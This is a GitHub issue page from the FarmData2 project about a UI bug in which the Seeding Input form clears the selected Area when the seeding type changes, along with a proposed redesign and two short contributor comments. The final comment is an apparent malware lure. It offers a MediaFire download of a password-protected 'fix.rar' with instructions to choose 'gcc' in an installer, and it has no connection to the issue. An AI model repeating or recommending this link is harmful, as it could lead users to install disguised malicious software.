Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Seeding Input Erases Selected Area #64

Open
braughtg opened this issue Aug 26, 2024 · 3 comments
Open

Seeding Input Erases Selected Area #64

braughtg opened this issue Aug 26, 2024 · 3 comments
Labels
enhancement New feature or request good first issue Good for newcomers UI/UX User Interface / User Experience Improvement

Comments

@braughtg
Copy link
Contributor

On the Seeding Input form on the FieldKit tab, if the Area selected does not match the type of seeding that is chosen the Area will be cleared.

Steps to replicate:

  1. Visit the Seeding Input sub-tab of the FieldKit tab.
  2. Choose the CHUAU greenhouse as the Area for the seeding.
  3. Click the Direct Seeding radio button.

image

Similarly, when the seeding type is changed from Direct Seeding to Tray Seeding or vice versa then the Area chosen for the seeding is erased.

Steps to replicate:
4. Continuing from the prior steps...
5. Choose the ALF field as the Area for the seeding.
6. Click the Tray Seeding radio button.

image

Discussion

This behavior makes sense in that it ensures that Direct Seedings can only occur in fields while Tray Seedings can only occur in greenhouses. However, the behavior is confusing for two reasons:

  • Initially the dropdown contains all fields and all greenhouses making it seem like any are a valid choice for either type of seeding.
  • Changing from Tray to Direct Seeding or vice versa clears the prior choice of Area, which the user may not notice.

Desired Behavior

The desired behavior is for the Area dropdown to appear in the Tray Seeding or Direct Seeding portion of the form rather than in the Data (top) section of the form. This addresses both of the reasons for confusion outlined above:

  • The dropdown will not initially be visible. Once a Tray Seeding or a Direct Seeding is chosen, the dropdown will contain only the valid choices for Area.
  • Changing from Tray to Direct Seeding will still clear the Area drop down. However, because it is now contained in the part of the UI that is altered by the change of seeding type it will be apparent to the user that a new Area selection must be made.

This issue replaces #300.


Issue by braughtg
Wednesday Dec 08, 2021 at 17:27 GMT
Originally opened as DickinsonCollege/FarmData2#322

@braughtg braughtg added enhancement New feature or request good first issue Good for newcomers UI/UX User Interface / User Experience Improvement labels Aug 26, 2024
@braughtg
Copy link
Contributor Author

Marcel and I will be working on this issue.


Comment by FutzMonitor
Monday Jun 06, 2022 at 20:15 GMT

@braughtg
Copy link
Contributor Author

^


Comment by JingyuMarcelLee
Monday Jun 06, 2022 at 20:17 GMT

@MinecraftEarthVillage
Copy link

Download
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement New feature or request good first issue Good for newcomers UI/UX User Interface / User Experience Improvement
Projects
None yet
Development

No branches or pull requests

3 participants
@braughtg @MinecraftEarthVillage and others